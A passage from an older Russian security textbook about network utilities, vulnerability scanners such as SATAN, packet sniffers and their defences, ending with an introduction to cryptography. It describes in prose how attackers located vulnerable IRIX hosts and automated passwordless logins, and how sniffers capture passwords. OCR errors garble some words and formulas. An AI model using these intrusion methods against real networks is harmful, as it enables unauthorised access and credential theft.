Действительно, сетевые утилиты выполняют ряд функций, которые характерны для сканеров. Однако в отличие от последних использование этих утилит вызывает меньше подозрений у системных администраторов. Выполнение большинства сетевых утилит на удаленной хост-машине практически не оказывает никакого влияния на ее функционирование. Сканеры же зачастую ведут себя как слон в посудной лавке и оставляют следы, которые трудно не заметить. Кроме того, хороший сканер — явление довольно редкое, а сетевые утилиты всегда под рукой. К недостаткам сетевых утилит можно отнести то, что приходится выполнять вручную слишком большую работу, чтобы добиться того же результата, который при помощи сканера получается автоматически.
Упомянутые выше сетевые утилиты можно встретить в любой операционной системе семейства UNIX. Однако предоставляемые ими возможности для сбора данных об удаленной хост-машине интересуют не только пользователей UNIX. Поэтому неудивительно, что многие из jthx утилит были перенесены в другие операционные системы.
Для Windows 95/98 имеются программные пакеты NetScan Tools (http://www.eskimo.com/~nwps/index.html). Network Toolbox (http://www.jriver. com/netbox.html) и TCP/IP Surveyor (http://www.rocketdownload.com/details/
inte/wssrv32nsrc.htm), которые реализуют выполнение сетевых утилит host, rusers, finger, Traceroute, ping, WHOIS. Последний из упомянутых пакетов не только осуществляет сбор информации о сети и подключенных к ней компьютерах, но и представляет собранную таким образом информацию в виде графа, вершинами которого служат найденные в сети маршрутизаторы, серверы и рабочие станции.
Пользователям персональных компьютеров типа Macintosh можно посоветовать обратить внимание на программные пакеты МасТСР Watcher (http://waldo.wi.mit.edu/WWW/tools/util/Mac/MacTCP_Watchei), Querylt! (http://tucows.online.ru/mac/adnload/dlqueryitinac.html) и What Route (http://homepages.ihug.co.nz/~bryanc).
Сканер в действии
Сканеры безусловно способствуют повышению уровня сетевой безопасности. Их с полным правом можно назвать санитарами компьютерных сетей. При этом не так уж и важно, в чьих руках находятся сканеры: хакеров или взломщиков. Если эти средства анализа защищенности сетей используются системным администратором, то положительный эффект от их применения не вызывает сомнений. Случай, когда взломщик применяет сканер для преодоления защитных механизмов компьютерной сети, рано или поздно будет выявлен, проанализирован, а в защитные механизмы сети внесены необходимые поправки, чтобы исключить повторный взлом.
Глупо думать, что сканеры вслепую рыщут по сети, отыскивая возможную мишень для взлома. Отнюдь нет. Все сканеры создаются в расчете на уже найденные дыры в защите хост-машин конкретного типа. Им остается только обнаружить хост-машину этого типа и проверить, действительно ли она сконфигурирована таким образом, что известная дыра все еще не "залатана". Для иллюстрации того, как можно использовать сканер, рассмотрим следующий пример.
В конце 1995 г. американская корпорация Silicon Graphics Incorporated (SGI) начала массовое производство мощных компьютеров серии WebForce. Для них имелось специальное программное обеспечение, предназначенное для создания Web-страниц, насыщенных мультимедийными приложениями. Эти компьютеры работали под управлением операционной системы IRIX (разновидность UNIX).
Вскоре в Internet разнесся слух о том, что некоторые версии IRIX имеют дефект, который позволяет удаленному пользователю регистрироваться в ней под именем 1р, при этом пароля вводить не нужно. В результате компьютерный взломщик, беспрепятственно вошедший в IRIX под именем 1р, обладал достаточными привилегиями, чтобы скопировать файл password, содержащий зашифрованные имена и пароли пользователей, с компьютера серии WebForce на свой компьютер. Дальше взломщик мог в спокойной обстановке попытаться дешифровать скопированный им файл, чтобы получить полный список имен и паролей пользователей компьютера SGI.
Итак, дыра в защите компьютеров серии WebForce была обнаружена. Оставалось только отыскать эти компьютеры в Internet. Поскольку их системные администраторы лучше разбирались в компьютерной графике и почти ничего не смыслили в вопросах сетевой безопасности, то некоторые каталоги на дисках вверенных их заботам компьютеров были доступны для всеобщего обозрения через Internet. В одном из этих каталогов содержался стандартный файл password из дистрибутива операционной системы IRIX. Большинство перечисленных в нем регистрационных имен пользователей были характерны для любой другой операционной системы семейства UNIX. Однако имелись среди них и имена, которые являлись уникальными именно для IRIX. Таким образом, пользуясь любой поисковой машиной сети Internet, можно было задать в качестве искомой информации ли имена и получить готовый список компьютеров серии WebForce.
Тем не менее, данный метод оказался не очень надежным, поскольку через несколько месяцев системные администраторы компьютеров серии WebForce спохватились и убрали файл password из общедоступных каталогов. Кроме того, не все версии операционной системы IRIX имели рассмотренный дефект. По этой причине взломщики решили прибегнуть к помощи , сканера. Был написан сканер, который случайным образом или на основе .каких-то дополнительных сведений выбирал некоторые сетевые адреса. Результаты обращения по этим адресам фиксировались в специальном текстовом файле. Его потом можно было проверить на наличие в нем строк типа:
Trying 199.200.0.1
Connecting to 199.200.0.1
Escape character is "]"
IRIX 4.1
Welcome to Graphics Town!
Login:
Некоторые взломщики автоматизировали этот процесс, заставив сканер регистрироваться в качестве 1р на удаленном компьютере. Если регистрация проходила успешно, то информация об этом факте заносилась в файл вместе с указанием адреса найденного компьютера.
Среди сканеров наибольшую известность получил SATAN (Security Administrator's Tool for Analyzing Networks). Этот сканер распространяется через 'Internet (его можно найти, например, по адресу http://www.fish.com), начиная с апреля 1995 г.
Ни одно средство анализа сетевой безопасности не вызывало столько споров, сколько пришлось на долю сканера SATAN. Газеты и журналы отреагировали на его появление пространными статьями, в которых изображали SATAN чуть ли не сатанинским изобретением. В телевизионных выпусках новостей звучали грозные предупреждения об опасности, которую для всех пользователей сетей представлял этот сканер.
И действительно, SATAN был довольно необычным для своего времени программным пакетом. Предназначенный для использования на рабочих станциях, работающих под управлением операционной системы UNIX, он обладает дружественным пользовательским интерфейсом. В нем имеются готовые формуляры, в которые пользователю остается только внести минимальные сведения об анализируемом сетевом объекте, а также таблицы, которые автоматически заполняются по мере накопления информации. При нахождении какого-либо изъяна в сетевой защите пользователю предлагается воспользоваться контекстно-зависимой справкой, чтобы лучше понять суть обнаруженного изъяна.
Под стать своему необычному детищу были и сами авторы SATAN — американцы Д. Фармер (D. Farmer) и У. Венема (W. Venema) — талантливые программисты, хакеры и авторитетные специалисты в области сетевой безопасности.
SATAN предназначен исключительно для работы в среде UNIX. Для его установки и запуска необходимы права администратора. Основная задача SATAN, как это следует из его названия, состоит в том, чтобы отыскивать изъяны в защитных механизмах компьютерной сети, в которой используется протокол TCP/IP. Следует особо подчеркнуть, что речь идет об уже известных изъянах. Это означает, что SATAN не делает ничего такого, что не по силам совершить опытному компьютерному взломщику, который вручную пытается преодолеть сетевую защиту.
Еще одной отличительной особенностью SATAN является его повышенная требовательность к системным ресурсам, особенно к производительности центрального процессора и объему оперативной памяти. Поэтому тем пользователям, которые хотят воспользоваться сканером SATAN, но имеют компьютеры с ограниченными ресурсами, можно посоветовать их увеличить. Если это по каким-либо причинам не реализуемо, следует попытаться избавиться от выполнения лишних процессов и работать с SATAN с помощью командной строки.
Сканер Strobe (Super Optimized TCP Port Surveyor) исследует порты TCP/IP выбранного компьютера и протоколирует все полученные сведения. Основное достоинство Strobe — быстрота сканирования. Если компьютер, на котором запущен Strobe, подключен к Internet через модем, работающий со скоростью 28800 бит/с, то на полное сканирование сервера ему понадобится всего около 30 с. Однако полученная информация будет довольно скудной — лишь общие диагностические сведения о сетевых службах сервера. Кроме того, в хост-машине, подвергшейся сканированию с помощью Strobe, этот факт не останется не замеченным (скорее всего, он будет зафиксирован в файле /var/adm/messages). Сканер Strobe можно скачать из Internet по адресу
Jackal (доступен в Internet по адресу http://www.giga.or.at/pub/hacker/unix) — это сканер-"призрак". Он анализирует сетевые домены, проникая сквозь брандмауэры и не оставляя при этом никаких следов своего проникновения
Сканер NSS (Network Security Scanner) замечателен прежде всего тем, что написан на языке Perl и, следовательно, может быть легко перенесен на любую платформу, для которой имеется интерпретатор этого языка. Другим достоинством NSS является скорость его работы. Желающие познакомиться с NSS поближе также могут обратиться в Internet по адрес\
Более узкая специализация характерна для IdentTCPscan (предназначен для определения регистрационного имени пользователя, работающего с данным портом TCP/IP), FSPScan (осуществляет поиск серверов, которые поддерживают сетевой протокол FSP), XSCAN (анализирует Х-серверы с целью нахождения изъянов в их конфигурации) и CONNECT (ищет серверы, работающие с протоколом TFTP). Все эти сканеры можно найти там же, где и Jackal с NSS.
Исторически сложилось, что подавляющее большинство сканеров было создано для операционной системы UNIX. Поэтому довольно трудно отыскать предназначенные для других платформ сканеры, которые по своей мощи, удобству использования и богатству возможностей могли бы сравниться с SATAN. Кроме того, многие отличные от UNIX платформы, поддерживающие протокол TCP/IP, реализуют его в неполном объеме.
Пользователям Windows 95/98, которые непременно хотят поскорее попробовать свои силы в поиске изъянов сетевой защиты, можно посоветовать применить сканер, который входит в упоминавшийся выше программный пакет Network Toolbox.
Следует отметить, что в средствах защиты сетей от взлома постоянно обнаруживаются новые изъяны. Соответственно претерпевают изменения и сканеры. Внесение в них поправок — дело не особенно трудоемкое: достаточно Дописать исходный код сканера с учетом недавно найденных брешей в сетевых защитных механизмах, и новая, более совершенная, версия сканера готова! Вот почему сканеры продолжают оставаться одним из самых главных средств защиты сетей. Системным администраторам необходимо иметь в распоряжении как можно больше таких средств — хороших и разных.
настоящее время технология построения компьютерных сетей Ethernet стала самым распространенным решением. Сети Ethernet завоевали огромную популярность благодаря хорошей пропускной способности, простоте установки и приемлемой стоимости сетевого оборудования. Участки сетей для которых скорости передачи данных 10 Мбит/с недостаточно, можно довольно легко модернизировать, чтобы повысить эту скорость до 100 Мбит/с (Fast Ethernet) или даже до 1 Гбит/с (Gigabit Ethernet).
Однако технология Ethernet не лишена существенных недостатков. Основной из них — передаваемая информация не защищена. Компьютеры, подключенные к сети Ethernet, оказываются в состоянии перехватывать информацию, адресованную своим соседям. Основной причиной тому является принятый в сетях Ethernet так называемый широковещательный механизм обмена сообщениями.
Локальное широковещание
В сети типа Ethernet подключенные к ней компьютеры, как правило, совместно используют один и тот же кабель, который служит средой для пересылки сообщений между ними. Если в комнате одновременно громко говорят несколько людей, разобрать что-либо из сказанного ими будет очень трудно. Когда по сети начинают "общаться" сразу несколько компьютеров, выделить из их "цифрового гвалта" полезную информацию и понять, кому именно она предназначена, практически невозможно. В отличие от человека, компьютер не может поднять руку и попросить тишины, поэтому для решения данной проблемы требуются иные, более сложные действия.
Компьютер сети Ethernet, желающий передать какое-либо сообщение по общему каналу, должен удостовериться, что этот канал в данный момент свободен. В начале передачи компьютер прослушивает несущую частоту сигнала, определяя, не произошло ли искажения сигнала в результате возникновения коллизий с другими компьютерами, которые ведут передачу одновременно с ним. При наличии коллизии компьютер прерывает передачу и "замолкает". По истечении некоторого случайного периода времени он пытается повторить передачу.
Если компьютер, подключенный к сети Ethernet, ничего не передает сам, он, тем не менее, продолжает "слушать" все сообщения, передаваемые по сети другими компьютерами. Заметив в заголовке поступившей порции данных свой сетевой адрес, компьютер копирует эти данные в свою локальную память.
Существуют два основных способа объединения компьютеров в сеть Ethernet. В первом случае компьютеры соединяются при помощи коаксиального кабеля. Этот кабель черной змейкой вьется от компьютера к компьютеру, соединяясь с сетевыми адаптерами Т-образным разъемом. Такая топология на языке профессионалов называется сетью Ethernet IOBase2. Однако ее еще можно назвать сетью, в которой "все слышат всех". Любой компьютер, подключенный к сети, способен перехватывать данные, посылаемые по этой сети другим компьютером.
Во втором случае каждый компьютер соединен кабелем типа витая пара с отдельным портом центрального коммутирующего устройства — концентратора или с коммутатора. В таких сетях, которые называются сетями Ethernet lOBaseT, компьютеры поделены на группы, именуемые доменами коллизий. Домены коллизий определяются портами концентратора пли коммутатора. замкнутыми на общую шину. В результате коллизии возникают не между всеми компьютерами сети, а по отдельности — между теми из них, которые входят в один и тот же домен коллизий, что повышает пропускную способность всей сети.
В последнее время в крупных сетях стали появляться коммутаторы нот но типа, которые не используют широковещание и не замыкают группы порки; между собой. Вместо этого все передаваемые по сети данные буферизуются в памяти и отправляются по мере возможности. Однако подобных сетей пока довольно мало — не более 10% от общего числа сетей типа Ethernet.
Таким образом, принятый в подавляющем большинстве Ethernet-сетей алгоритм передачи данных требует от каждого компьютера, подключенного к сети, непрерывного "прослушивания" всего без исключения сетевого трафика. Предложенные алгоритмы доступа, при использовании которых компьютеры отключались бы от сети на время передачи "чужих" сообщений, так и остались нереализованными из-за их чрезмерной сложности и малой эффективности.
Анализатор протоколов как он есть
Как уже было сказано, сетевой адаптер каждого компьютера в сети Ethernet как правило "слышит" все, о чем "толкуют" между собой его соседи по сегменту этой сети. Но обрабатывает и помещает в свою локальную память он ; только те порции (так называемые кадры) данных, которые содержат его уникальный сетевой адрес.
В дополнение к этому подавляющее большинство современных Ethernet-адаптеров допускают функционирование в особом режиме, называемом беспорядочным (promiscuous). При использовании данного режима адаптер копирует в локальную память компьютера все без исключения передаваемые по сети кадры данных.
Специализированные программы, переводящие сетевой адаптер в беспорядочный режим и собирающие весь трафик сети для последующего анализа, называются анализаторами протоколов. Администраторы сетей широко применяют анализаторы протоколов для осуществления контроля за работой этих сетей и определения их перегруженных участков, отрицательно влияющих на скорость передачи данных. К сожалению, анализаторы протоколов используются и злоумышленниками, которые с их помощью могут перехватывать чужие пароли и другую конфиденциальную информацию.
Надо отметить, что анализаторы протоколов представляют серьезную опасность. Само присутствие в компьютерной сети анализатора протоколов указывает на то, что в ее защитных механизмах имеется брешь. Установить анализатор протоколов мог посторонний человек, который проник в сеть извне (например, если сеть имеет выход в Internet). Но это могло быть и делом рук доморощенного злоумышленника, имеющего легальный доступ к сети. В любом случае к сложившейся ситуации нужно отнестись со веси серьезностью.
Специалисты в области компьютерной безопасности относят атаки на компьютеры при помощи анализаторов протоколов к так называемым атакам второго уровня. Это означает, что компьютерный взломщик уже сумел проникнуть сквозь защитные барьеры сети и теперь стремится развить свой успех. При помощи анализатора протоколов он может попытаться перехватить регистрационные имена и пароли пользователей, их секретные финансовые данные (например, номера кредитных карточек) и конфиденциальные сообщения (к примеру, электронную почту). Имея в своем распоряжении достаточные ресурсы, компьютерный взломщик в принципе может перехватывать всю информацию, передаваемую по сети.
Анализаторы протоколов существуют для любой платформы. Но даже если окажется, что для какой-то платформы анализатор протоколов пока еще не написан, с угрозой, которую представляет атака на компьютерную систему при помощи анализатора протоколов, по-прежнему приходится считаться. Дело в том, что анализаторы протоколов исследуют не конкретный компьютер, а протоколы. Поэтому анализатор протоколов может обосноваться в любом узле сети и оттуда перехватывать сетевой трафик, который в результате широковещательных передач попадает в каждый компьютер, подключенный к сети.
Одна из первых атак, проведенных при помощи анализаторов протоколов, была зафиксирована в 1994 г. в США. Тогда неизвестный злоумышленник разместил анализатор протоколов на различных хостах и магистральных узлах сетей Internet и Milnet, в результате чего ему удалось перехватить более 100 тыс. регистрационных имен и паролей пользователей. Среди пострадавших от атаки оказались Калифорнийский государственный университет и Ракетная лаборатория министерства обороны США.
Наиболее частыми целями атак компьютерных взломщиков, которые те осуществляют, используя анализаторы протоколов, являются университеты. Хотя бы из-за огромного количества различных регистрационных имен и паролей, которые могут быть украдены в ходе такой атаки. Да и сами студенты отнюдь не брезгуют возможностями анализаторов протоколов. Нередким является случай, когда несколько студентов, заняв компьютер, подключенный к локальной сети университетской библиотеки, быстро устанавливают с нескольких дискет анализатор протоколов. Затем они просят ничего не подозревающую жертву, сидящую за соседним компьютером: "Вы не могли бы заглянуть в свой почтовый ящик, а то у нас почему-то электронная почта не работает?" Несколько минут спустя вся эта группа компьютерных взломщиков-любителей, перехватив регистрационное имя и пароль доступа соседа к почтовому серверу, с удовольствием знакомится с содержимым его почтового ящика и посылает письма от его имени.
Использование анализатора протоколов на практике не является такой уж легкой задачей, как это может показаться. Чтобы добиться от него хоть какой- то пользы, компьютерный взломщик должен хорошо знать сетевые технологии. Просто установить и запустить анализатор протоколов нельзя, поскольку даже в небольшой локальной сети из пяти компьютеров трафик составляет тысячи и тысячи пакетов в час. И следовательно, за короткое время выходные данные анализатора протоколов заполнят жесткий диск полностью.
Поэтому компьютерный взломщик обычно настраивает анализатор протоколов так, чтобы он перехватывал только первые 200—300 байт каждого пикета, передаваемого по сети. Обычно именно в заголовке пакета размешается информация о регистрационном имени и пароле пользователя, которые, как правило, больше всего интересуют взломщика. Тем не менее, если в распоряжении взломщика имеется достаточно пространства на жестком диске, то увеличение объема перехватываемого трафика пойдет ему только на пользу. В результате он может дополнительно узнать много интересного.
На серверах в сети Internet есть множество анализаторов протоколов, которые отличаются лишь набором доступных функций. Например, поиск по запросам protocol analyzer и sniffer на сервере www.softseek.com сразу лает ссылки на добрый десяток программных пакетов.
Для компьютеров, работающих под управлением операционных систем Windows, одними из лучших являются анатизаторы протоколов Lan Explorer компании Intellimax и NetXRay компании Network Associates. NetXRay (в переводе с английского — Сетевой рентген) обладает обширным набором функций, которые позволяют делать моментальный снимок "внутренностей" сети Ethernet, определять, какие ее узлы и сегменты несут наибольшую нагрузку, составлять отчеты и строить диаграммы на основе полученных данных. Бесплатная версия NetXRay доступна в Internet по адресу http://www.nai.com/asp_set/products/tnv/smflerbasic intro.asp. Анализатор протоколов Lan Explorer (в переводе с английского — Анализатор ЛВС) не уступает по своей функциональности NetXRay, имеет очень хороший пользовательский интерфейс, удобен и прост в использовании. Пробная 15-дневная версия Lan Explorer доступна по адресу
Анализатор протоколов Network Monitor входит в состав операционной системы Windows NT 4.0 Server корпорации Microsoft. Для его установки следует в Панели управления (Control Panel) дважды щелкнуть на пиктограмме Сеть (Network), затем перейти на вкладку Службы (Sen ice-, к нажать кнопку Добавить (Add) и в появившемся диалоговом окне выбран, Network Monitor Tools and Agent. После установки Network Monitor можно запустить из папки Network Analysis Tools раздела Администрирование (Administrative Tools) в меню Программы (Programs).
Защита от анализаторов протоколов
Надо сразу оговориться, что в советах относительно того, как защищаться от анализатора протоколов, нуждаются только те, кто желает дать отпор компьютерным взломщикам, использующим анализаторы протоколов для организации атак на компьютерные системы, подключенные к сети. В руках сетевого администратора анализатор протоколов является весьма полезным инструментом, помогающим находить и устранять неисправности, избавляться от узких мест, снижающих пропускную способность сети, и обнаруживать проникновение в нее компьютерных взломщиков.
Посоветовать можно следующее:
Возможность шифрования почтовых паролей предоставляется надстройкой над почтовым протоколом POP (Post Office Protocol) — протоколом АРОР (Authentication POP). При работе с АРОР по сети каждый раз передается новая зашифрованная комбинация, которая не позволяет злоумышленнику извлечь какую-либо практическую пользу из информации, перехваченной с помощью анализатора протоколов. Проблема только в том, что не все почтовые серверы и клиенты поддерживают АРОР.
Другой продукт под названием Secure Shell, или сокращенно — SSL, был изначально разработан финской компанией SSH Communications Security (http://www.ssh.fi) и в настоящее время имеет множество реализаций, доступных бесплатно через Internet. SSL представляет собой защищенный протокол для осуществления безопасной передачи сообщений по компьютерной сети с помощью шифрования.
Особую известность среди компьютерных пользователей приобрела серия программных пакетов, предназначенных для защиты передаваемых по сети данных путем шифрования и объединенных присутствием в их названии аббревиатуры PGP, которая означает Pretty Good Privacy. Бесплатно распространяемые версии программ шифрования из этой серии можно отыскать в Internet по адресу http://www.pgpi.org.
Глава 5. Основы криптографии
Зачем нужна криптография
Криптография бывает разная. Есть криптография, которая не позволяет вашему малолетнему сынишке насладиться созерцанием изображений обнаженной натуры, втайне переписанных вами ночью из сети Internet на домашний компьютер. Но кроме этого существует и криптография, которая не дает вашему правительству узнать про вас то, что вы не хотите, чтобы оно знало.
Если я напишу письмо, положу его в сейф, а сейф спрячу подальше от посторонних глаз и на спор попрошу вас прочесть мое письмо, — это не безопасность, а банальная игра в прятки. Но если я предоставлю вам свободный доступ не только к моему запертому сейфу, но и к сотне других подобных ему сейфов, к их ключевым комбинациям, позволю вам и лучшим взломщикам сейфов в мире во всех подробностях изучить конструкцию моего сейфа вместе с замком, но все равно никто не сможет открыть мой сейф и прочесть находящееся в нем письмо — вот это настоящая безопасность!
В течение многих лет такая криптография была прерогативой исключительно военных. Агентство национальной безопасности (АНБ) в США, а также соответствующие ведомства в Англии, России, и в других развитых странах тратили огромные деньги на обеспечение безопасности собственных линий связи и на добывание полезной информации из чужих. А простые граждане, не имея достаточных финансовых средств и не обладая необходимыми знаниями, были бессильны защитить свою частную жизнь от вмешательства со стороны государства.
За последние 20 лет положение в корне изменилось. Этому способствовали чрезвычайно интенсивные научные исследования в области криптографии, которые привели к тому, что современная компьютерная криптография "обитает" не только в стенах строго охраняемых военных учреждении, но и на страницах общедоступных журналов, монографии и учебников. Теперь при желании кто угодно может зашифровать свои данные таким образом. чтобы защитить их от самого могущественного противника — правительственных ведомств, специализирующихся на краже информации.
Нуждается ли рядовой обыватель в подобной защите? Конечно, нуждается. Под ее прикрытием он может вести учет своих финансовых затрат, не опасаясь, что с ними ознакомятся налоговые службы. Он может разрабатывать новое изделие для последующей выгодной продажи на рынке, надежно пряча детали своей разработки от конкурентов. Он может завести любовницу и не бояться, что волей случая жена окажется посвященной в подробности его тайной любовной переписки. Ведь любой не застрахован от ситуации, котла он занимается какой-то деятельностью, которую он сам не считает незаконной, но которая впоследствии может быть объявлена кем-то вне закона. Каковы бы ни были причины, человек имеет право на частную жизнь, в том числе — на сохранение в тайне любых сведений, которые он сочтет нужным не предавать огласке. И никому, в том числе и государству, не должно быть до них никакого дела.
На практике все обстоит совершенно иначе. Своим Указом № 334 от 3 апреля 1995 г. президент России строго-настрого запретил "деятельность юридических и физических лиц, связанную с разработкой, производством, реализацией и эксплуатацией шифровальных средств, |...| предоставлением услуг в области шифрования информации", без государственных лицензий. А российские спецслужбы обязал "осуществлять выявление юридических и физических лиц, нарушающих требования настоящего Указа". Что с такими лицами будут делать — вырывать им ноздри или просто ставить клеймо на лоб, чтобы другим неповадно было, — в президентском Указе не сказано. Но и без этого у государственных чиновников в России появились все необходимые полномочия, чтобы при необходимости можно было воспрепятствовать внедрению надежных систем криптографической защиты информации. Надо сказать, что аналогично действует и американское правительство, которое путем введения государственного стандарта шифрования с передачей ключей на хранение пытается узаконить для себя право шпионить за своими гражданами.
Таким образом, становится совершенно очевидно, что надежность шифровальных средств — традиционно лишнее качество для "Большого брата", независимо от его национальной принадлежности. Совершенно в духе знаменитого романа "1984", принадлежащего перу английского писателя Джорджа Оруэлла, звучат аргументы сторонников введения ничем не ограниченного права государства на перехват информации частного характера. Они заявляют, что с человеком, которому есть что скрывать от собственного государства, происходит что-то неладное, поэтому к нему необходимо как следует присмотреться.
В любом демократическом государстве правоохранительным органам традиционно предоставлялась возможность на законных основаниях вести слежку, если разрешение на нее было получено в судебном порядке. Ныне этого недостаточно: правительства принуждают своих граждан самих принять все необходимые меры, чтобы можно было без помех вести за ними наблюдение. Тем самым государственная власть узурпирует права, которые в демократическом государстве должны принадлежать народу. И если в такой стране начнет править диктатор, его власть будет неограниченном. Свергнуть его будет невозможно, ибо любая попытка граждан объединиться вместе, чтобы противостоять диктатуре, станет ему известна. Настолько всемогущей является современная технология.
В связи с вышесказанным необходимо, чтобы все спецслужбы, которые обладают правом доступа к современным техническим средствам слежки зa гражданами своей страны, действовали в рамках законности и под контролем компетентных органов, подотчетных народу, ибо пересечь обратно границу, один раз перейденную в направлении от демократии к диктатуре, будет уже невозможно. Ведь даже в США — стране с самой развитой, по общему признанию, демократией в мире, никто не имеет достаточных гарантий того, что не разделит судьбу многих честных соотечественников, которые в разное время подвергались преследованию только потому, что по убеждения были неугодны властям.
Самая затяжная и беспощадная война нашего столетия ведется поразительно тихо. В ней обходятся без ракетно-бомбовых ударов и без расстрела заложников. Однако и здесь порочат, калечат и уничтожают людей точно так же, как и на обычной войне. А отвоевываются не чужие территории или право распоряжаться судьбами побежденных, а информация. И противостоят друг другу не "хорошие" и "плохие" парни, даже не озверевшие наемники. а государство и его граждане.
В информационной войне государство пользуется двумя основными видами оружия. Во-первых, в любую сертифицированную государством систему защиты информации встраивается так называемый потайной ход. который иногда еще именуют лазейкой. Еще в 1991 г. в сенат США был внесен законопроект, который требовал, чтобы любое американское криптографическое оборудование содержало потайной ход, известный АН Б. Поэтому совершенно не удивительно, что один из крупнейших разработчиков криптографического оборудования в США — компания AT&T — нисколько не скрывает того факта, что у американского правительства есть "ключики" "потайных ходов", ведущих во все ее системы вне зависимости от тою. насколько сложные пароли придумают неискушенные пользователи.
Второй способ обмана граждан является более изощренным и состоит в применении системы с депонированием ключей. В этом случае прочесть сообщение можно только при наличии всех частей ключа, использованного для засекречивания этого сообщения. Тайна переписки гарантируется до тех пор, пока государству не понадобится с ней ознакомиться. Тогда стоит заручиться согласием, скажем, тех доверенных лиц или организаций, которым были отданы на хранение части ключа, — и тайное станет явным. В США данный подход был подвергнут справедливой критике со стороны большинства специалистов, а корпоративные пользователи с негодованием отвергли саму идею довериться правительству в таком деликатном вопросе, как коммерческая тайна. И это в законопослушной Америке, где ставшие явными попытки спецслужб вторгнуться в частную жизнь своих граждан встречают немедленный и достойный отпор!
Из сказанного следует сделать один важный вывод. Недостаточно уметь защищать себя с помощью закона, непременно требуется еще и криптографическая защита. Шифрование играет слишком большую роль в современном мире, чтобы отдать его на откуп государству.
Криптографические средства можно объявить вне закона. Но ваша личная информация всегда будет легальной, и, следовательно, должна быть надежно защищена от посторонних.
Терминология
Шифрование и расшифрование
Предположим, что отправитель хочет послать сообщение получателю. Более того, отправитель желает засекретить это сообщение, чтобы никто, кроме получателя, не смог его прочитать.
Сообщение состоит из открытого текста. Процесс преобразования открытого текста с целью сделать непонятным его смысл для посторонних называется шифрованием. В результате шифрования сообщения получается шифр-текст. Процесс обратного преобразования шифртекста в открытый текст называется расшифрованием.
Наука, которая учит, как следует поступать, чтобы сохранить содержание сообщений в тайне, называется криптографией. Людей, занимающихся криптографией, зовут криптографами. Криптоаналитики являются специалистами в области криптоанализа — науки о вскрытии шифров, которая отвечает на вопрос о том, как прочесть открытый текст, скрывающийся пол шифрованным. Раздел науки, объединяющий криптографию и криптоанализ, именуется криптологией.
Обозначим открытый текст буквой Р (от английского слова plaintext). Это может быть текстовый файл, битовое изображение, оцифрованный звук — что угодно. Единственное ограничение связано с тем, что, поскольку, прел метом изложения является компьютерная криптография, под Р понимание;; исключительно двоичные данные.
Шифртекст обозначается буквой С (от английского слова ciphertext) и также представляет собой двоичные данные. Объем полученного шифртекста иногда совпадает с объемом соответствующего открытого текста, а иногда превышает его. После зашифрования преобразованный открытый текст может быть передан по каналам компьютерной сети или сохранен в памяти компьютера.
На вход функции шифрования Е подается Р, чтобы на выходе получить С.
В обозначениях, принятых в математике, это записывается как:
Е(Р) = C
При обратном преобразовании шифртекста в открытый текст на вход функции расшифрования D поступает С, а на выходе получается Р:
D(C) = М
Поскольку смысл любого криптографического преобразования открытого текста состоит в том, чтобы потом этот открытый текст можно было восстановить в первозданном виде, верно следующее соотношение:
D(E(P)) = Р
Аутентификация, целостность и неоспоримость
Помогая сохранить содержание сообщения в тайне, криптография может быть использована, чтобы дополнительно обеспечить решение следующих задач:
Перечисленные задачи часто приходится решать на практике для организации взаимодействия людей при помощи компьютеров и компьютерных сетей. Подобные же задачи возникают и в случае личностного человеческого общения: часто требуется проверить, а действительно ли ваш собеседник тот, за кого он себя выдает, и подлинны ли предъявленные им документы. будь то паспорт, водительское удостоверение или страховой полис. Вот почему в обыденной жизни не обойтись без аутентификации, проверки целостности и доказательства неоспоримости, а значит и без криптографии.
Шифры и ключи
Криптографический алгоритм, также называемый шифром или алгоритмом шифрования, представляет собой математическую функцию, используемую для шифрования и расшифрования. Если быть более точным, таких функций две: одна применяется для шифрования, а другая — для расшифрования.
Когда надежность криптографического алгоритма обеспечивается за счет сохранения в тайне сути самого алгоритма, такой алгоритм шифрования называется ограниченным. Ограниченные алгоритмы представляют значительный интерес с точки зрения истории криптографии, однако совершенно непригодны при современных требованиях, предъявляемых к шифрованию. Ведь в этом случае каждая группа пользователей, желающих обмениваться секретными сообщениями, должна обзавестись своим оригинальным алгоритмом шифрования. Применение готового оборудования и стандартных программ исключено, поскольку тогда любой сможет приобрести это оборудование и эти программы и ознакомиться с заложенным в них алгоритмом шифрования. Придется разрабатывать собственный криптографический алгоритм, причем делать это надо будет каждый раз, когда кто-то из пользователей группы захочет ее покинуть или когда детали алгоритма случайно станут известны посторонним.
В современной криптографии эти проблемы решаются с помощью использования ключа, который обозначается буквой К (от английского слова key). Ключ должен выбираться среди значений, принадлежащих множеству, которое называется ключевым пространством. И функция шифрования Е, и функция расшифрования D зависят от ключа. Сей факт выражается присутствием К в качестве подстрочного индекса у функций Е и D:
Е к (Р) = С
D к (С) = Р
По-прежнему справедливо следующее тождество:
D k (E k (P)) = P
Некоторые алгоритмы шифрования используют различные ключи для шифрования и расшифрования. Это означает, что ключ шифрования К 1 отличается от ключа расшифрования К 2 . В этом случае справедливы следующие соотношения:
Е к 1 ( P ) = С
D k2 (С) = Р
D k2 (E k1 (Р) ) = Р
Надежность алгоритма шифрования с использованием ключей достигается., за счет их надлежащего выбора и последующего хранения в строжайшем секрете. Это означает, что такой алгоритм не требуется держать в тайне. Можно организовать массовое производство криптографических средств, основу функционирования которых положен данный алгоритм. Знание криптографического алгоритма не позволит злоумышленнику прочесть зашифрованные сообщения, поскольку он не знает секретный ключ, использованный для их зашифрования.
Под криптосистемой понимается алгоритм шифрования, а также можно всевозможных ключей, открытых и шифрованных текстов.
Симметричные алгоритмы шифрования
Существуют две разновидности алгоритмов шифрования с использованием ключей — симметричные и с открытым ключом. Симметричным называют криптографический алгоритм, в котором ключ, используемый для шифрования сообщений, может быть получен из ключа расшифрования и наоборот. В большинстве симметричных алгоритмов применяют всего один ключ. Такие алгоритмы именуются одноключевыми, или алгоритмами с секретным ключом, и требуют, чтобы отправитель сообщений и их получатель и рапсе условились о том, каким ключом они будут пользоваться. Надежность одноключевого алгоритма определяется выбором ключа, поскольку его значение дает возможность злоумышленнику без помех расшифровывать все перехваченные сообщения. Поэтому выбранный ключ следует хранить в тайне от посторонних.
Шифрование и расшифрование в симметричных криптографических алгоритмах задаются уже знакомыми формулами:
Е к (Р) = С
D к (С) = Р
Симметричные алгоритмы шифрования бывают двух видов. Одни из них обрабатывают открытый текст побитно. Они называются потоковыми алгоритмами, или потоковыми шифрами. Согласно другим, открытый текст разбивается на блоки, состоящие из нескольких бит. Такие алгоритмы называются блочными, или блочными шифрами. В современных компьютерных алгоритмах блочного шифрования обычно длина блока составляет 64 бита.
Алгоритмы шифрования с открытым ключом
